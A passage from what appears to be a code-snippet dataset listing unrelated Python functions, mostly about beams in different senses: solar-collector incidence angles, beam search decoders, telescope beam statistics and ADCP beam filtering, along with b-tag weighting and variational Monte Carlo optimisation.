0.000027381118880 * teta_T ** 3 - 0.000326340326281 * teta_T ** 2 + 0.002973799531468 * teta_T + 1.000713286764210\n IAM_b = IAMT * IAML # overall incidence angle modifier for beam radiation\n return IAM_b\n\n # convert to radians\n teta_z = radians(teta_z)\n tilt = radians(tilt_angle)\n\n g_vector = np.radians(g_vector)\n ha_vector = np.radians(ha_vector)\n lat = radians(latitude)\n Sz_vector = np.radians(Sz_vector)\n Az_vector = np.radians(Az_vector)\n Incidence_vector = np.vectorize(solar_equations.calc_incident_angle_beam)(g_vector, lat, ha_vector, tilt,\n teta_z) # incident angle in radians\n\n # calculate incident angles\n if type_SCpanel == 'FP':\n incident_angle = np.degrees(Incidence_vector)\n Teta_L = np.vectorize(calc_teta_L_max)(incident_angle)\n Teta_T = 0 # not necessary for flat plate collectors\n if type_SCpanel == 'ET':\n Teta_L = np.vectorize(calc_teta_L)(Az_vector, teta_z, tilt, Sz_vector) # in degrees\n Teta_T = np.vectorize(calc_teta_T)(Az_vector, Sz_vector, teta_z) # in degrees\n\n # calculate incident angle modifier for beam radiation\n IAM_b_vector = np.vectorize(calc_IAMb)(Teta_L, Teta_T, type_SCpanel)\n\n return IAM_b_vector", "def sr(self, params, r_s, sz_s, energy_s):\n\n self.itr += 1\n\n r_av = jnp.reshape(r_s[:,:,0:self.nav,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nav, self.npart, self.ndim))\n sz_av = jnp.reshape(sz_s[:,:,0:self.nav,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nav, self.npart, 2))\n energy_av = jnp.reshape(energy_s[:,:,0:self.nav], (self.n_devices, self.nwalk // self.n_devices * self.nav))\n\n r_val = jnp.reshape(r_s[:,:,0:self.nac,:,:], (self.n_devices, self.nwalk // 
self.n_devices * self.nac, self.npart, self.ndim))\n sz_val = jnp.reshape(sz_s[:,:,0:self.nac,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nac, self.npart, 2))\n energy_val = jnp.reshape(energy_s[:,:,0:self.nac], (self.n_devices, self.nwalk // self.n_devices * self.nac))\n r_avg, r_max = self.observables.radius_pmap(r_val, sz_val)\n logger.info(f\"Maximum Radius validation=, {jnp.sqrt(r_max):.3f} \")\n logger.info(f\"Average Radius validation=, {jnp.sqrt(r_avg):.3f} \")\n psi_val = self.wavefunction.psi_pmap(params, r_val, sz_val)\n logger.info(f\"Maximum Psi validation= ,{jnp.max(jnp.abs(psi_val)):.4e} \")\n logger.info(f\"Average Psi validation= ,{jnp.mean(jnp.abs(psi_val)):.4e} \")\n logger.info(f\"Minimum Psi validation= ,{jnp.min(jnp.abs(psi_val)):.4e} \")\n\n r_tst = jnp.reshape(r_s[:,:,self.nav:self.nav+self.nac,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nac, self.npart, self.ndim))\n sz_tst = jnp.reshape(sz_s[:,:,self.nav:self.nav+self.nac,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nac, self.npart, 2))\n energy_tst = jnp.reshape(energy_s[:,:,self.nav:self.nav+self.nac], (self.n_devices, self.nwalk // self.n_devices * self.nac))\n r_avg, r_max = self.observables.radius_pmap(r_tst, sz_tst)\n logger.info(f\"Maximum Radius test=, {jnp.sqrt(r_max):.3f} \")\n logger.info(f\"Average Radius test=, {jnp.sqrt(r_avg):.3f} \")\n psi_tst = self.wavefunction.psi_pmap(params, r_tst, sz_tst)\n logger.info(f\"Maximum Psi test= ,{jnp.max(jnp.abs(psi_tst)):.4e} \")\n logger.info(f\"Average Psi test= ,{jnp.mean(jnp.abs(psi_tst)):.4e} \")\n logger.info(f\"Minimum Psi test= ,{jnp.min(jnp.abs(psi_tst)):.4e} \")\n\n if (self.solver == 'Adam'):\n dp_i, self.g2_i, self.m_i = self.adam(params, r_av, sz_av, energy_av, g2_i = self.g2_i, m_i = self.m_i, itr = self.itr)\n elif (self.solver == 'Cholesky'):\n dp_i, self.g2_i = self.sr_cholesky(params, r_av, sz_av, energy_av, g2_i = self.g2_i, itr = self.itr) \n elif (self.solver == 'Pseudo'):\n dp_i = self.sr_pseudo(params, r_av, sz_av, energy_av) \n elif (self.solver == 'CG'):\n dp_i, self.g2_i = self.sr_cg(params, r_av, sz_av, energy_av, dp0_i=self.dp_i, g2_i = self.g2_i, itr = self.itr) \n\n self.dp_i = dp_i\n energy_d_min= 1.\n converged = False\n dp_range = jnp.linspace(0.1, 0.8, self.nstep)\n for n in range (self.nstep):\n# dt = dt_range[n]\n dp_n = self.delta * dp_i#[n] #+ dp_range[n] * self.dp_o\n dp_max = jnp.max(jnp.abs(dp_n)) \n delta_p = self.wavefunction.unflatten_params(dp_n) \n# delta_p = self.wavefunction.unflatten_params( self.delta * dp_i ) \n\n psi_d_tst, psi_d_err_tst, energy_d_tst, energy_d_err_tst, overlap_tst = self.pmap_dist(delta_p, params, r_tst, sz_tst, psi_tst, energy_tst)\n dist_tst = jnp.arccos(jnp.sqrt(psi_d_tst))**2\n logger.debug(f\"dist acos tst = {dist_tst:.8f}\")\n logger.debug(f\"energy diff tst = {energy_d_tst:.6f}, err = {energy_d_err_tst:.6f}\")\n logger.debug(f\"overlap tst= { jnp.arccos(jnp.sqrt(overlap_tst))**2:.8f}\")\n \n psi_d_val, psi_d_err_val, energy_d_val, energy_d_err_val, overlap_val = self.pmap_dist(delta_p, params, r_val, sz_val, psi_val, energy_val)\n dist_val = jnp.arccos(jnp.sqrt(psi_d_val))**2\n logger.debug(f\"dist acos val = {dist_val:.8f}\")\n logger.debug(f\"energy diff val= {energy_d_val:.6f}, err = {energy_d_err_val:.6f}\")\n logger.debug(f\"overlap val = { jnp.arccos(jnp.sqrt(overlap_val))**2:.8f}\")\n\n logger.debug(f\"delta param max = {dp_max:.6f}\")\n logger.debug(f\"delta param avg = {jnp.linalg.norm(dp_n):.6f}\")\n\n if ( dist_tst < 0.1 and dist_val 
< 0.1 and energy_d_val < energy_d_min and dp_max < 0.5):\n energy_d_min = energy_d_val\n energy_d_err_min = energy_d_err_val\n delta_p_min = delta_p\n dp_n_min = dp_n\n converged = True\n if converged: \n logger.debug(f\"Converged, energy diff min = {energy_d_min:.6f}, err = {energy_d_err_min:.6f}\")\n else:\n logger.debug(f\"Not converged\")\n delta_p_min = self.wavefunction.unflatten_params(jnp.zeros(self.nparams))\n dp_n_min = jnp.zeros(self.nparams)\n return delta_p_min", "def _beam(self):\n\n return self._beam_factory.simple(self.detectorbase.wavelength)", "def __smooth_emission_params(self):\n params_count = {}\n unique_symbols = []\n for key, value in self.emission_dict.items():\n if key[0] not in unique_symbols:\n unique_symbols.append(key[0])\n \n n = len(unique_symbols)\n # n refers to the number of observations/symbols \n\n for state in self.states:\n params_count[state] = [0,0,0]\n # print(params_count[state])\n # key is the state, value is list [total no. of symbols, total no. of non-zero probability, probability p]\n # i.e. [Ts, v, p]\n for key, value in self.emission_dict.items():\n if state in key:\n params_count[state][0] += 1\n if value != 0:\n params_count[state][1] += 1\n else:\n continue\n params_count[state][2] += 1/(params_count[state][0] + params_count[state][1])\n # p = 1/(Ts+v)\n \n for state in self.states:\n for key, value in self.emission_dict.items():\n if state in key:\n if value != 0:\n self.emission_dict[key] = value - params_count[state][2]\n else:\n self.emission_dict[key] = (params_count[state][2]*params_count[state][2])/n-params_count[state][2]\n # v*p/n-v", "def beam_search(self, src_sent, beam_size=5, max_decoding_time_step=70):\n src_sents_var = to_tensor(self.vocabs.src, [src_sent], device=self.device)\n\n src_encodings, dec_init_vec = self.encoder(src_sents_var, [len(src_sent)])\n src_encodings_att_linear = self.decoder.attn_projection(src_encodings)\n\n h_tm1 = dec_init_vec\n att_tm1 = torch.zeros(1, self.decoder.hidden_size, device=self.device)\n\n hypotheses = [[\"<sos>\"]]\n hyp_scores = torch.zeros(len(hypotheses), dtype=torch.float, device=self.device)\n completed_hypotheses = []\n\n t = 0\n while len(completed_hypotheses) < beam_size and t < max_decoding_time_step:\n t += 1\n hyp_num = len(hypotheses)\n\n exp_src_encodings = src_encodings.expand(hyp_num,\n src_encodings.size(1),\n src_encodings.size(2))\n\n exp_src_encodings_att_linear = src_encodings_att_linear.expand(hyp_num,\n src_encodings_att_linear.size(1),\n src_encodings_att_linear.size(2))\n\n y_tm1 = torch.tensor([self.vocabs.tgt.w2i[hyp[-1]] for hyp in hypotheses], dtype=torch.long, device=self.device)\n y_t_embed = self.decoder.embedding(y_tm1)\n\n x = torch.cat([y_t_embed, att_tm1], dim=-1)\n\n (h_t, cell_t), att_t, _ = self.decoder.step(x, h_tm1,\n exp_src_encodings, exp_src_encodings_att_linear, encoder_masks=None)\n\n # log probabilities over target words\n log_p_t = F.log_softmax(self.decoder.vocab_projection(att_t), dim=-1)\n\n live_hyp_num = beam_size - len(completed_hypotheses)\n contiuating_hyp_scores = (hyp_scores.unsqueeze(1).expand_as(log_p_t) + log_p_t).view(-1)\n top_cand_hyp_scores, top_cand_hyp_pos = torch.topk(contiuating_hyp_scores, k=live_hyp_num)\n\n prev_hyp_ids = top_cand_hyp_pos / len(self.vocabs.tgt)\n hyp_word_ids = top_cand_hyp_pos % len(self.vocabs.tgt)\n\n new_hypotheses = []\n live_hyp_ids = []\n new_hyp_scores = []\n\n for prev_hyp_id, hyp_word_id, cand_new_hyp_score in zip(prev_hyp_ids, hyp_word_ids, top_cand_hyp_scores):\n prev_hyp_id = 
prev_hyp_id.item()\n hyp_word_id = hyp_word_id.item()\n cand_new_hyp_score = cand_new_hyp_score.item()\n\n hyp_word = self.vocabs.tgt.i2w[hyp_word_id]\n new_hyp_sent = hypotheses[prev_hyp_id] + [hyp_word]\n if hyp_word == \"<eos>\":\n completed_hypotheses.append(Hypothesis(value=new_hyp_sent[1:-1],\n score=cand_new_hyp_score))\n else:\n new_hypotheses.append(new_hyp_sent)\n live_hyp_ids.append(prev_hyp_id)\n new_hyp_scores.append(cand_new_hyp_score)\n\n if len(completed_hypotheses) == beam_size:\n break\n\n live_hyp_ids = torch.tensor(live_hyp_ids, dtype=torch.long, device=self.device)\n h_tm1 = (h_t[live_hyp_ids], cell_t[live_hyp_ids])\n att_tm1 = att_t[live_hyp_ids]\n\n hypotheses = new_hypotheses\n hyp_scores = torch.tensor(new_hyp_scores, dtype=torch.float, device=self.device)\n\n if len(completed_hypotheses) == 0:\n completed_hypotheses.append(Hypothesis(value=hypotheses[0][1:],\n score=hyp_scores[0].item()))\n\n completed_hypotheses.sort(key=lambda hyp: hyp.score, reverse=True)\n\n return completed_hypotheses", "def cal_ResBeam_Stats(infile, header_bmaj, header_bmin):\n\n beamlog_file = np.loadtxt(infile)\n bmaj = beamlog_file[:,1]\n bmin = beamlog_file[:,2]\n ind_nonzero_bmaj = np.nonzero(bmaj) # finding array indices of nonzero values\n ind_nonzero_bmin = np.nonzero(bmin)\n total_nbmaj = np.count_nonzero(bmaj) # count total number of bmaj non zero occurance\n total_nbmin = np.count_nonzero(bmin)\n bmaj_variance = (np.sum((bmaj[ind_nonzero_bmaj]-header_bmaj)**2.0))/total_nbmaj # using header beam value as mean \n bmin_variance = (np.sum((bmin[ind_nonzero_bmin]-header_bmin)**2.0))/total_nbmin\n bmaj_stdev = np.sqrt(bmaj_variance)\n bmin_stdev = np.sqrt(bmin_variance)\n beam_threshold = round((((header_bmaj + bmaj_stdev) * (header_bmin + bmin_stdev))/ (header_bmaj*header_bmin))-1.0, 4)\n bmaj_max = np.max(bmaj[ind_nonzero_bmaj])\n bmaj_min = np.min(bmaj[ind_nonzero_bmaj])\n bmin_max = np.max(bmin[ind_nonzero_bmin])\n bmin_min = np.min(bmin[ind_nonzero_bmin])\n max_ratio_beam_area = (bmaj_max*bmin_max)/(header_bmaj*header_bmin) # measured beam area / header beam area\n min_ratio_beam_area = (bmaj_min*bmin_min)/(header_bmaj*header_bmin)\n\n return bmaj_stdev, bmin_stdev, beam_threshold, max_ratio_beam_area, min_ratio_beam_area", "def main_beam_eff(beam=1, ZA=0, frequency=1400.): # apply the frequency at 1400\n D = 300 # m\n n_R = 1.0\n lam = 299792458./(1e6*frequency)\n theta = beam_size(beam=beam,frequency=frequency)/60. * np.pi/180.\n ape_eff = aperture_eff(beam=beam, ZA=ZA, frequency=frequency) \n mb_eff = 0.8899 * ape_eff / n_R * theta**2 * D**2 / lam**2\n\n return mb_eff", "def calc_enginprops(self):\n # Let's assemble the ABD matrix even if it is not required\n ABD = np.bmat([[self.A, self.B], [self.B, self.D]])\n ABD_inv = np.linalg.inv(ABD)\n # We would use the whole matrix. 
This gives results similar to elamX and considers poisson effects\n A_inv = ABD_inv[0:3, 0:3]\n self.Ex = 1 / (self.total_t * A_inv[0, 0]) # It is 2 * t because we need total thickness\n self.Ey = 1 / (self.total_t * A_inv[1, 1])\n self.Gxy = 1 / (self.total_t * A_inv[2, 2])\n self.poissonxy = - A_inv[0,1] / A_inv[0, 0]\n # Flexural stiffness properties\n self.zx = 0.0\n self.zy = 0.0\n zx_dem = 0.0\n zy_dem = 0.0\n self.EIx = 0.0\n self.EIy = 0.0\n z = 0.0\n # Calculate neutral axis in direction x and y\n for S_bar, t in zip(self.S_bars, self.ts):\n Ex = 1 / S_bar[0, 0]\n Ey = 1 / S_bar[1, 1]\n z += t / 2.0\n self.zx += Ex * t * z\n zx_dem += Ex * t\n self.zy += Ey * t * z\n zy_dem += Ey * t\n z += t / 2.0\n self.zx = self.zx / zx_dem\n self.zy = self.zy / zy_dem\n # Calculate EI in direction x and y\n z = 0.0\n for S_bar, t in zip(self.S_bars, self.ts):\n Ex = 1 / S_bar[0, 0]\n Ey = 1 / S_bar[1, 1]\n Gxy = 1 / S_bar[2, 2]\n z += t / 2.0\n self.EIx += Ex * (t**3 / 12 + t * (z - self.zx)**2)\n self.EIy += Ey * (t**3 / 12 + t * (z - self.zy)**2)\n self.GA += Gxy * t\n z += t / 2.0\n return self.Ex, self.Ey, self.Gxy, self.poissonxy", "def _beam_search(self, state):\n\n beam = [(self.episode_reward, self.mcts_head)]\n next_beam = []\n\n def format_beam():\n return [node.path for _, node in beam]\n\n if self.verbose > 1:\n logger.debug(f\"Starting beam search with beam size {self.beam_size}. Initial beam: {format_beam()}\")\n\n while beam or next_beam:\n for i, (_, node) in enumerate(beam):\n # Parse current state\n this_state, total_reward, terminal = self._parse_path(state, node.path)\n node.set_terminal(terminal)\n if self.verbose > 1:\n logger.debug(f\" Analyzing node {i+1} / {len(beam)} on beam: {node.path}\")\n\n # Expand\n if not node.terminal and not node.children:\n actions = self._find_legal_actions(this_state)\n step_rewards = [self._parse_action(action, from_which_env=\"sim\") for action in actions]\n if self.verbose > 1:\n logger.debug(f\" Expanding: {len(actions)} legal actions\")\n node.expand(actions, step_rewards=step_rewards)\n\n # If terminal, backup reward\n if node.terminal:\n if self.verbose > 1:\n logger.debug(f\" Node is terminal\")\n if self.verbose > 1:\n logger.debug(f\" Backing up total reward {total_reward}\")\n node.give_reward(self.episode_reward + total_reward, backup=True)\n\n # Did we already process this one? 
Then skip it\n if node.n_beamsearch >= self.beam_size:\n if self.verbose > 1:\n logger.debug(f\" Already beam searched this node sufficiently\")\n continue\n\n # Beam search selection\n for action in node.select_beam_search(self.beam_size):\n next_reward = total_reward + node.children[action].q_step\n next_node = node.children[action]\n next_beam.append((next_reward, next_node))\n\n # Mark as visited\n node.in_beam = True\n\n # Just keep top entries for next step\n beam = sorted(next_beam, key=lambda x: x[0], reverse=True)[: self.beam_size]\n if self.verbose > 1:\n logger.debug(\n f\"Preparing next step, keeping {self.beam_size} / {len(next_beam)} nodes in beam: {format_beam()}\"\n )\n next_beam = []\n\n logger.debug(f\"Finished beam search\")\n\n if self.verbose > 0:\n choice = self.mcts_head.select_best(mode=\"max\")\n self._report_decision(choice, state, \"Beam search\")", "def analyze_natural_focusing(ps_beg, beamline, gamma, id_slices, zplot):\n\n ps_before = ps_beg\n\n count_UND = 0\n\n for element in beamline:\n ps_after = np.dot( element.M1, ps_before ) +element.M2\n\n # Check whether this element is an undulatorself.\n if isinstance(element, Undulator):\n count_UND += 1\n # The phase space distribution along the bunch before and after the\n # bunch.\n ps_s_before = beam_property_along_s(ps_before, id_slices)\n ps_s_after = beam_property_along_s(ps_after, id_slices)\n\n label1 = 'Before UND '+str(count_UND)\n label2 = 'After UND '+str(count_UND)\n save_name = 'Natural_focusing_in_UND'+str(count_UND)\n plt.figure()\n plt.plot(zplot[0:-1], ps_s_before[3,:]*gamma, label = label1)\n plt.plot(zplot[0:-1], ps_s_after[3,:]*gamma, label = label2)\n plt.grid()\n plt.legend()\n plt.savefig(save_name)\n ## End if\n\n ps_before = ps_after\n\n return", "def filter_beam(self, setting):\n\n self.beam_filter = setting\n\n # In manual mode determine number of raw invalid and number of 3 beam solutions\n # 3 beam solutions if selected\n if self.beam_filter > 0:\n\n # Find invalid raw data\n valid_vel = np.ones(self.raw_vel_mps.shape)\n valid_vel[np.isnan(self.raw_vel_mps)] = 0\n\n # Determine how many beams transformed coordinates are valid\n valid_vel_sum = np.sum(valid_vel, 0)\n valid = np.ones(valid_vel_sum.shape)\n\n # Compare number of valid beams or coordinates to filter value\n valid[valid_vel_sum < self.beam_filter] = False\n\n # Save logical of valid data to object\n self.valid_data[5, :] = valid\n\n else:\n\n # Apply automatic filter\n # ----------------------\n # Find all 3 beam solutions\n self.filter_beam(3)\n beam_3_valid_data = copy.deepcopy(self.valid_data)\n self.filter_beam(4)\n valid_3_beams = np.logical_xor(beam_3_valid_data[5, :], self.valid_data[5, :])\n n_ens = len(self.valid_data[5, :])\n idx = np.where(valid_3_beams == True)[0]\n\n # If 3 beam solutions exist evaluate there validity\n if len(idx) > 0:\n\n # Identify 3 beam solutions that appear to be invalid\n n3_beam_ens = len(idx)\n\n # Check each three beam solution for validity\n for m in range(n3_beam_ens):\n\n # Use before and after values to check 3-beam solution\n # but make sure the ensemble is not the first or last.\n if (idx[m] > 1) and (idx[m] < n_ens):\n\n # Find nearest 4 beam solutions before and after\n # 3 beam solution\n ref_idx_before = np.where(self.valid_data[5, :idx[m]] == True)[0]\n if len(ref_idx_before) > 0:\n ref_idx_before = ref_idx_before[-1]\n else:\n ref_idx_before = None\n\n ref_idx_after = np.where(self.valid_data[5, idx[m]:] == True)[0]\n if len(ref_idx_after) > 0:\n ref_idx_after = idx[m] + 
ref_idx_after[0]\n else:\n ref_idx_after = None\n\n if (ref_idx_after is not None) and (ref_idx_before is not None):\n u_ratio = (self.u_mps[idx[m]]) / ((self.u_mps[ref_idx_before]\n + self.u_mps[ref_idx_after]) / 2.) - 1\n v_ratio = (self.v_mps[idx[m]]) / ((self.v_mps[ref_idx_before]\n + self.v_mps[ref_idx_after]) / 2.) - 1\n else:\n u_ratio = 1\n v_ratio = 1\n\n # If 3-beam differs from 4-beam by more than 50% mark it invalid\n if (np.abs(u_ratio) > 0.5) and (np.abs(v_ratio) > 0.5):\n self.valid_data[5, idx[m]] = False\n else:\n self.valid_data[5, idx[m]] = True\n\n self.beam_filter = -1\n\n # Combine all filter data to composite valid data\n self.valid_data[0, :] = np.all(self.valid_data[1:, :], 0)\n self.num_invalid = np.sum(self.valid_data[0, :] == False)", "def calculate_marginal(self):\n self.marginal_ray=beam_field()\n m=self.marginal_ray\n m.U=np.array([[[0,0,1]]])\n m.Q_p=np.array([[[0,self.entrance_pupil,0]]])\n m.propagate(self.surfaces)", "def prob_t_a_given_s(self, alignment_info):\n ...", "def initialize(self, es):\n r = es.sp.weights.mueff / es.popsize\n self.index_to_compare = 0.5 * (r**0.5 + 2.0 * (1 - r**0.5) / np.log(es.N + 9)**2) * (es.popsize) # TODO\n self.index_to_compare = 0.30 * es.popsize # TODO\n self.damp = 2 - 2 / es.N # sign-rule: 2\n self.c = 0.3 # sign-rule needs <= 0.3\n self.s = 0 # averaged statistics, usually between -1 and +1", "def analyze(self, event):\n jets = Collection(event, \"Jet\")\n\n BTagWeightN = 1.0\n BTagWeightN_up = 1.0\n BTagWeightN_down = 1.0\n BTagWeightN_FS = 1.0\n BTagWeightN_up_FS = 1.0\n BTagWeightN_down_FS = 1.0\n BTagWeightD = 1.0\n BTagWeightNHeavy = 1.0\n BTagWeightNHeavy_up = 1.0\n BTagWeightNHeavy_down = 1.0\n BTagWeightNHeavy_FS = 1.0\n BTagWeightNHeavy_up_FS = 1.0\n BTagWeightNHeavy_down_FS = 1.0\n BTagWeightDHeavy = 1.0\n BTagWeightNLight = 1.0\n BTagWeightNLight_FS = 1.0\n BTagWeightNLight_up = 1.0\n BTagWeightNLight_up_FS= 1.0\n BTagWeightNLight_down = 1.0\n BTagWeightNLight_down_FS = 1.0\n BTagWeightDLight = 1.0\n\n for jet in jets:\n pt = jet.pt\n eta = abs(jet.eta)\n flavor = jet.hadronFlavour\n\n if not ( pt > self.jetPtMin and eta < self.jetEtaMax): continue\n\n if flavor == 5:\n pt_bin = self.h_eff_b.GetXaxis().FindBin(pt); \n if pt_bin > self.h_eff_b.GetXaxis().GetNbins():\n pt_bin = self.h_eff_b.GetXaxis().GetNbins(); \n eta_bin = self.h_eff_b.GetYaxis().FindBin(eta); \n if eta_bin > self.h_eff_b.GetYaxis().GetNbins():\n eta_bin = self.h_eff_b.GetYaxis().GetNbins();\n\n eff = self.h_eff_b.GetBinContent(pt_bin, eta_bin);\n\n elif flavor == 4:\n pt_bin = self.h_eff_c.GetXaxis().FindBin(pt); \n if pt_bin > self.h_eff_c.GetXaxis().GetNbins():\n pt_bin = self.h_eff_c.GetXaxis().GetNbins(); \n eta_bin = self.h_eff_c.GetYaxis().FindBin(eta); \n if eta_bin > self.h_eff_c.GetYaxis().GetNbins():\n eta_bin = self.h_eff_c.GetYaxis().GetNbins();\n\n eff = self.h_eff_c.GetBinContent(pt_bin, eta_bin);\n\n else:\n pt_bin = self.h_eff_udsg.GetXaxis().FindBin(pt); \n if pt_bin > self.h_eff_udsg.GetXaxis().GetNbins():\n pt_bin = self.h_eff_udsg.GetXaxis().GetNbins(); \n eta_bin = self.h_eff_udsg.GetYaxis().FindBin(eta); \n if eta_bin > self.h_eff_udsg.GetYaxis().GetNbins():\n eta_bin = self.h_eff_udsg.GetYaxis().GetNbins();\n\n eff = self.h_eff_udsg.GetBinContent(pt_bin, eta_bin);\n \n if self.FastSim:\n btagSF = jet.btagSF\n btagSF_FS=jet.btagSF_FS\n btagSF_up_FS = jet.btagSF_FS_up\n btagSF_down_FS = jet.btagSF_FS_down\n btagSF_down = jet.btagSF_down\n btagSF_up = jet.btagSF_up\n else:\n btagSF = jet.btagSF\n btagSF_FS= 1.0\n 
btagSF_up = jet.btagSF_up\n btagSF_down = jet.btagSF_down\n btagSF_up_FS = 1.0\n btagSF_down_FS = 1.0\n \n if jet.btagDeepB > self.bDiscCut:\n #check if eff is zero\n if eff < 0.001:\n eff = 0.001\n \n BTagWeightN *= btagSF * eff\n BTagWeightN_FS *= btagSF_FS * eff\n BTagWeightN_up *= btagSF_up * eff\n BTagWeightN_down *= btagSF_down * eff\n BTagWeightN_up_FS *= btagSF_up_FS * eff\n BTagWeightN_down_FS *= btagSF_down_FS * eff\n\n if abs(flavor) == 5:\n BTagWeightNHeavy *= btagSF * eff\n BTagWeightNHeavy_FS *= btagSF_FS * eff\n BTagWeightNHeavy_up *= btagSF_up * eff\n BTagWeightNHeavy_down *= btagSF_down * eff\n BTagWeightNHeavy_up_FS *= btagSF_up_FS * eff\n BTagWeightNHeavy_down_FS *= btagSF_down_FS * eff\n BTagWeightDHeavy *= eff\n else:\n BTagWeightNLight *= btagSF * eff\n BTagWeightNLight_FS *= btagSF_FS * eff\n BTagWeightNLight_up *= btagSF_up * eff\n BTagWeightNLight_down *= btagSF_down * eff\n BTagWeightNLight_up_FS *= btagSF_up_FS * eff\n BTagWeightNLight_down_FS *= btagSF_down_FS * eff\n BTagWeightDLight *= eff\n\n BTagWeightD *= eff\n else:\n #check if eff is 1.0\n if eff > 0.999:\n eff = 0.999\n\n BTagWeightN *= 1 - btagSF * eff\n BTagWeightN_FS *= 1 - btagSF_FS * eff\n BTagWeightN_up *= 1 - btagSF_up * eff\n BTagWeightN_down *= 1 - btagSF_down * eff\n BTagWeightN_up_FS *= 1 - btagSF_up_FS * eff\n BTagWeightN_down_FS *= 1 - btagSF_down_FS * eff\n\n if abs(flavor) == 5:\n BTagWeightNHeavy *= 1 - btagSF * eff\n BTagWeightNHeavy_FS *= 1 - btagSF_FS * eff\n BTagWeightNHeavy_up *= 1 - btagSF_up * eff\n BTagWeightNHeavy_down *= 1 - btagSF_down * eff\n BTagWeightNHeavy_up_FS *= 1 - btagSF_up_FS * eff\n BTagWeightNHeavy_down_FS *= 1 - btagSF_down_FS * eff\n BTagWeightDHeavy *= 1 - eff\n else:\n BTagWeightNLight *= 1 - btagSF * eff\n BTagWeightNLight_FS *= 1 - btagSF_FS * eff\n BTagWeightNLight_up *= 1 - btagSF_up * eff\n BTagWeightNLight_up_FS *= 1 - btagSF_up_FS * eff\n BTagWeightNLight_down *= 1 - btagSF_down * eff\n BTagWeightNLight_down_FS *= 1 - btagSF_down_FS * eff\n BTagWeightDLight *= 1 - eff\n\n BTagWeightD *= 1 - eff\n \n if self.FastSim:\n self.out.fillBranch(\"BTagWeight_FS\", BTagWeightN_FS / BTagWeightD)\n self.out.fillBranch(\"BTagWeight_Up_FS\", BTagWeightN_up_FS / BTagWeightD)\n self.out.fillBranch(\"BTagWeight_Down_FS\", BTagWeightN_down_FS / BTagWeightD)\n self.out.fillBranch(\"BTagWeightHeavy_FS\", BTagWeightNHeavy_FS / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightHeavy_Up_FS\", BTagWeightNHeavy_up_FS / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightHeavy_Down_FS\", BTagWeightNHeavy_down_FS / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightLight_FS\", BTagWeightNLight_FS / BTagWeightDLight)\n self.out.fillBranch(\"BTagWeightLight_Up_FS\", BTagWeightNLight_up_FS / BTagWeightDLight)\n self.out.fillBranch(\"BTagWeightLight_Down_FS\", BTagWeightNLight_down_FS / BTagWeightDLight)\n self.out.fillBranch(\"BTagWeight\", BTagWeightN / BTagWeightD)\n self.out.fillBranch(\"BTagWeight_Up\", BTagWeightN_up / BTagWeightD)\n self.out.fillBranch(\"BTagWeight_Down\", BTagWeightN_down / BTagWeightD)\n self.out.fillBranch(\"BTagWeightHeavy\", BTagWeightNHeavy / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightHeavy_Up\", BTagWeightNHeavy_up / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightHeavy_Down\", BTagWeightNHeavy_down / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightLight\", BTagWeightNLight / BTagWeightDLight)\n self.out.fillBranch(\"BTagWeightLight_Up\", BTagWeightNLight_up / BTagWeightDLight)\n self.out.fillBranch(\"BTagWeightLight_Down\", 
BTagWeightNLight_down / BTagWeightDLight)\n return True", "def _forward_beam_search(self, state: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n batch_size = state[\"source_mask\"].size()[0]\n start_predictions = state[\"source_mask\"].new_full(\n (batch_size,), fill_value=self._start_index)\n\n # shape (all_top_k_predictions): (batch_size, beam_size, num_decoding_steps)\n # shape (log_probabilities): (batch_size, beam_size)\n all_top_k_predictions, log_probabilities = self._beam_search.search(\n start_predictions, state, self.take_step)\n\n output_dict = {\n \"class_log_probabilities\": log_probabilities,\n \"predictions\": all_top_k_predictions\n }\n return output_dict", "def beam_search(X, u, w, b, relLabels):\n\n candidate_paths = [[] for _ in range(10)] # contains the candidate label sets\n candidate_vals =[[] for _ in range(10)] # contains the label values (-1/1) for each candidate set\n candidate_scores = [0. for _ in range(10)]\n min_score = -1000\n\n iter = 0\n start = 0\n while True:\n # print(\"Iter: \", iter)\n intermediate_paths = {}\n # intermediate_paths_val = []\n interim_scores = []\n hash_table = {}\n\n cnt_paths = 0\n for cp in range(5):\n labels_curr = candidate_paths[cp]\n labels_val_curr = candidate_vals[cp]\n scores_curr = candidate_scores[cp]\n Y = -np.ones((10, 1))\n for lv in range(len(labels_val_curr)):\n Y[labels_curr[lv]] = labels_val_curr[lv]\n\n for l in range(10):\n candidate_interim = labels_curr[:]\n candidate_vals_interim = labels_val_curr[:]\n # if l in labels_curr:\n # continue\n\n temp_relLabels = []\n for lc in range(len(labels_curr)):\n temp_relLabels.extend(relLabels[labels_curr[lc]])\n\n # temp_relLabels = np.array(list(set(temp_relLabels)))\n temp_relLabels = np.array(list(set(relLabels[l]).intersection(set(labels_curr))))\n model_pos = returnModelVal(X, Y, 1.0, u[l], u[l], b[l][0], np.array(temp_relLabels))\n candidate_interim.append(l)\n\n if model_pos < 0:\n # print('hello')\n candidate_vals_interim.append(-1)\n interim_scores.append(-model_pos)\n else:\n candidate_vals_interim.append(1)\n interim_scores.append(model_pos)\n\n hash_table[cnt_paths] = candidate_interim\n intermediate_paths[cnt_paths] = candidate_vals_interim\n cnt_paths += 1\n # For the first iteration, just iterate once - all labels in one iteration\n if start == 0:\n start = 1\n break\n\n temp_paths = intermediate_paths\n interim_zip = zip(intermediate_paths, interim_scores)\n sorted_scores = sorted(interim_zip, key=lambda x: x[1], reverse=True)[:5]\n intermediate_paths, scores = zip(*sorted_scores)\n\n temp_cand = []\n temp_val = []\n for i in range(len(intermediate_paths)):\n temp_cand.append(hash_table[intermediate_paths[i]])\n temp_val.append(temp_paths[intermediate_paths[i]])\n # candidate_scores[i] += scores[i]\n\n candidate_paths = temp_cand\n candidate_vals = temp_val\n print(candidate_paths)\n print(candidate_vals)\n # print(scores)\n # candidate_scores = scores\n\n # Exit condition from loop\n # if max(interim_scores) < min_score:\n # break\n #\n # min_score = min(interim_scores)\n\n iter += 1\n if iter > 5:\n break\n\n candidate_dict = 